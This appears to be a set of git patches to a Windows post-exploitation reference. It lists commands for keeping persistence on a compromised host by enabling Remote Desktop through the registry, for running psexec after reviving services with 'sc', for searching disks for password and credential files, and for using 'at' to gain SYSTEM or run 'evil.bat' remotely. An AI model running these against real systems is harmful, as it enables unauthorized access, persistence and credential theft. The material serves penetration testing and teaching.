From 62a18ac3e0c9504fee3d6b3f8039ca32532a27fa Mon Sep 17 00:00:00 2001 From: webbreacher Date: Wed, 22 Jan 2014 21:40:49 -0500 Subject: [PATCH 1/3] Adding content from Issue #9. Reorg'ing content to put it with similar stuff and in the right places. --- persistence/windows/general.md | 26 +++++++++++++------------- pivoting/windows/remote.md | 26 +++++++++++++------------- presence/windows/find_files.md | 8 +++++++- 3 files changed, 33 insertions(+), 27 deletions(-) diff --git a/persistence/windows/general.md b/persistence/windows/general.md index 241ab27..651fbfd 100644 --- a/persistence/windows/general.md +++ b/persistence/windows/general.md @@ -13,21 +13,21 @@ return false; Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt. +### Remote Assistance Enable + * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f` + * **Description**: **Must be admin to run this.** Enable remote assistance through adding a registry entry on the local system. + * **Output**: + *
**Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +The operation completed successfully.
-### Enable `psexec` -The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. - -
-c:\> net use \\[TargetIP]\ipc$ username /user:password
-c:\> sc \\[TargetIP] config netdde start= auto
-c:\> sc \\[TargetIP] config netddedsdm start= auto
-c:\> sc \\[TargetIP] config clipsrv start= auto
-c:\> sc \\[TargetIP] start netdde
-c:\> sc \\[TargetIP] start netddedsdm
-c:\> sc \\[TargetIP] start clipsrv
-
+### Remote Desktop Enable - Method 1 + * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f` + * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system. + * **Output**: + *
**Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +The operation completed successfully.
-### Enable Remote Desktop +### Remote Desktop Enable - Method 2 Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below. 1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system. diff --git a/pivoting/windows/remote.md b/pivoting/windows/remote.md index cc95915..ff0d4e1 100644 --- a/pivoting/windows/remote.md +++ b/pivoting/windows/remote.md @@ -71,19 +71,19 @@ Commands that move data and files between systems on a network and are usually e * **Output**: *
**Windows 2008:** Show/Hide
C:\Users\johndoe>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console johndoe 1 Active
rdp-tcp 65536 Listen
-### Remote Assistance Enable - * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f` - * **Description**: **Must be admin to run this.** Enable remote assistance through adding a registry entry on the local system. - * **Output**: - *
**Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -The operation completed successfully.
- -### Remote Desktop Enable - * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f` - * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system. - * **Output**: - *
**Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -The operation completed successfully.
+### psexec + * **Command with arguments**: `psexec \\[computername|IP] [cmd]` + * **Description**: The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. +
+c:\> net use \\[computername|IP]\ipc$ username /user:password
+c:\> sc \\[computername|IP] config netdde start= auto
+c:\> sc \\[computername|IP] config netddedsdm start= auto
+c:\> sc \\[computername|IP] config clipsrv start= auto
+c:\> sc \\[computername|IP] start netdde
+c:\> sc \\[computername|IP] start netddedsdm
+c:\> sc \\[computername|IP] start clipsrv
+
+ * **Example Command**: `psexec \\1.1.1.1 ipconfig /all` would retrieve the IP settings for the 1.1.1.1 system. ### tasklist * **Command with arguments**: `tasklist /v /s [computername|IP]` diff --git a/presence/windows/find_files.md b/presence/windows/find_files.md index 2dbcb7a..307d48a 100644 --- a/presence/windows/find_files.md +++ b/presence/windows/find_files.md @@ -18,7 +18,13 @@ Commands that find files on the filesystem and are usually executed from the con * **Command with arguments**: `dir /a` * **Description**: Displays files with specified attributes. Examples: D=Directories, R=Read-only files, H=Hidden files, A=Files ready for archiving, S=System files * **Output**: - *
**Windows 2008:** Show/Hide
C:\Users\johndoe>dir /a c:\
Volume in drive C has no label. Volume Serial Number is 1A09-5F16

Directory of c:\

01/19/2008 03:45 AM $Recycle.Bin
09/18/2006 04:43 PM 24 autoexec.bat
10/08/2013 10:27 PM Boot
04/11/2009 08:00 AM 333,257 bootmgr
10/08/2013 10:27 PM 8,192 BOOTSECT.BAK
09/18/2006 04:43 PM 10 config.sys
01/19/2008 06:47 AM Documents and Settings [C:\Users]
10/23/2013 07:39 PM 2,460,454,912 pagefile.sys
01/19/2008 04:40 AM PerfLogs
10/08/2013 06:36 PM Program Files
10/08/2013 06:36 PM
10/10/2013 07:59 PM Users
10/23/2013 07:38 PM Windows
5 File(s) 2,460,796,395 bytes
10 Dir(s) 33,311,416,320 bytes free
+ *
**Windows 2008:** Show/Hide
C:\Users\johndoe>dir /a c:\
Volume in drive C has no label. Volume Serial Number is 1A09-5F16

Directory of c:\

01/19/2008 03:45 AM $Recycle.Bin
09/18/2006 04:43 PM 24 autoexec.bat
10/08/2013 10:27 PM Boot
04/11/2009 08:00 AM 333,257 bootmgr
10/08/2013 10:27 PM 8,192 BOOTSECT.BAK
09/18/2006 04:43 PM 10 config.sys
01/19/2008 06:47 AM Documents and Settings [C:\Users]
10/23/2013 07:39 PM 2,460,454,912 pagefile.sys
01/19/2008 04:40 AM PerfLogs
10/08/2013 06:36 PM Program Files
10/08/2013 06:36 PM
10/10/2013 07:59 PM Users
10/23/2013 07:38 PM Windows
5 File(s) 2,460,796,395 bytes
10 Dir(s) 33,311,416,320 bytes free
+ +### Searching Sub-directories + * **Command with arguments**: `dir /s *[term]*` + * **Description**: Searches for the word entered in the [term] section in all sub-directories ofthe current directory. + * **Example Terms**: `pass`, `cred`, `vnc`, `.config`, `sysprep.*` + * **Attribution**: http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607 ### Recursive * **Command with arguments**: `dir /b /s [directory or filename]` From 0f442d0f80ff8b085047c83d1f84e0e6e111f5e2 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Wed, 22 Jan 2014 21:54:18 -0500 Subject: [PATCH 2/3] Continued to add content from Rob's talk. Stopped at slide 35. More to come. --- privesc/windows/index.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/privesc/windows/index.md b/privesc/windows/index.md index bb4f8e1..7511fe1 100644 --- a/privesc/windows/index.md +++ b/privesc/windows/index.md @@ -2,4 +2,15 @@ Command that can be executed from the context of a shell prompt that help escalate or increase attacker privilege of the target. - * [UAC](uac.md) - How to bypass UAC. \ No newline at end of file + * [UAC](uac.md) - How to bypass UAC. + +# General Commands +### at (Scheduler) + * **Command with arguments**: `at [TIME] [cmd]` + * **Description**: This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system. + * **Examples**: + * Locally - `at 13:20 /interactive cmd` + * Remotely - From http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607 + * `net use \\[computername|IP] /user:DOMAIN\username password` + * `net time \\[computername|IP]` + * `at \\[computername|IP] 13:20 c:|temp\evil.bat` \ No newline at end of file From abd704773de96f86170af962098b995887540ea4 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Thu, 23 Jan 2014 09:22:56 -0500 Subject: [PATCH 3/3] Quick fix to evil.bat bath --- privesc/windows/index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/privesc/windows/index.md b/privesc/windows/index.md index 7511fe1..3186a55 100644 --- a/privesc/windows/index.md +++ b/privesc/windows/index.md @@ -13,4 +13,4 @@ Command that can be executed from the context of a shell prompt that help escala * Remotely - From http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607 * `net use \\[computername|IP] /user:DOMAIN\username password` * `net time \\[computername|IP]` - * `at \\[computername|IP] 13:20 c:|temp\evil.bat` \ No newline at end of file + * `at \\[computername|IP] 13:20 c:\temp\evil.bat`